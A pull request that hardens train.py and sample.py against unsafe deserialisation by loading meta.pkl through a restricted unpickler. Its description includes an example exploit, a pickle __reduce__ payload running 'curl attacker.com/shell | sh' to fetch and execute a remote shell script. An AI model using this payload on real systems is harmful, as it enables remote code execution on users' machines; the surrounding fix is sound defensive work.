### PR TITLE
security: use restricted unpickler for meta.pkl to prevent code execution

### DIFF
--- a/sample.py
+++ b/sample.py
@@ -60,8 +60,13 @@ if init_from == 'resume' and 'config' in checkpoint and 'dataset' in checkpoint[
     load_meta = os.path.exists(meta_path)
 if load_meta:
     print(f"Loading meta from {meta_path}...")
+    class _RestrictedUnpickler(pickle.Unpickler):
+        def find_class(self, module, name):
+            raise pickle.UnpicklingError(
+                f"Refusing to unpickle class {module}.{name} in meta.pkl"
+            )
     with open(meta_path, 'rb') as f:
-        meta = pickle.load(f)
+        meta = _RestrictedUnpickler(f).load()
     # TODO want to make this more general to arbitrary encoder/decoder schemes
     stoi, itos = meta['stoi'], meta['itos']
     encode = lambda s: [stoi[c] for c in s]

--- a/train.py
+++ b/train.py
@@ -138,8 +138,16 @@ best_val_loss = 1e9
 meta_path = os.path.join(data_dir, 'meta.pkl')
 meta_vocab_size = None
 if os.path.exists(meta_path):
+    # use a restricted unpickler to prevent arbitrary code execution (CWE-502).
+    # meta.pkl only contains built-in types (dict, int, list, str), so we block
+    # all class/module imports which is the mechanism pickle exploits use.
+    class _RestrictedUnpickler(pickle.Unpickler):
+        def find_class(self, module, name):
+            raise pickle.UnpicklingError(
+                f"Refusing to unpickle class {module}.{name} in meta.pkl"
+            )
     with open(meta_path, 'rb') as f:
-        meta = pickle.load(f)
+        meta = _RestrictedUnpickler(f).load()
     meta_vocab_size = meta['vocab_size']
     print(f"found vocab_size = {meta_vocab_size} (inside {meta_path})")
 


### PR DESCRIPTION
## Summary

Fixes #661 — `pickle.load()` in `train.py` and `sample.py` can execute arbitrary Python code via crafted `meta.pkl` files (CWE-502: Deserialization of Untrusted Data).

### The Vulnerability

```python
with open(meta_path, 'rb') as f:
    meta = pickle.load(f)  # can execute arbitrary code
```

Python's `pickle.load()` calls `__reduce__` on deserialized objects, allowing a crafted `.pkl` file to execute system commands. A malicious `meta.pkl` distributed in a dataset archive could run arbitrary code when a user starts training.

**Example exploit payload:**
```python
import pickle, os
class Exploit:
    def __reduce__(self):
        return (os.system, ('curl attacker.com/shell | sh',))
pickle.dump({'vocab_size': 50257, 'exploit': Exploit()}, open('meta.pkl', 'wb'))
```

### The Fix

Replace `pickle.load()` with a `RestrictedUnpickler` that blocks all class/module imports — the mechanism pickle exploits use:

```python
class _RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        raise pickle.UnpicklingError(
            f"Refusing to unpickle class {module}.{name} in meta.pkl"
        )
```

This is **backward-compatible** — `meta.pkl` files generated by `prepare.py` scripts only contain built-in Python types (`dict`, `int`, `list`, `str`), which pickle deserializes without calling `find_class`.

### Files Changed

- `train.py` — restricted unpickler for meta.pkl loading
- `sample.py` — same fix for the identical pickle.load() call

### Testing

- Existing `meta.pkl` files (containing `{'vocab_size': N, 'itos': {...}, 'stoi': {...}}`) load correctly since they only use built-in types
- Malicious payloads using `__reduce__` are blocked by `find_class` raising `UnpicklingError`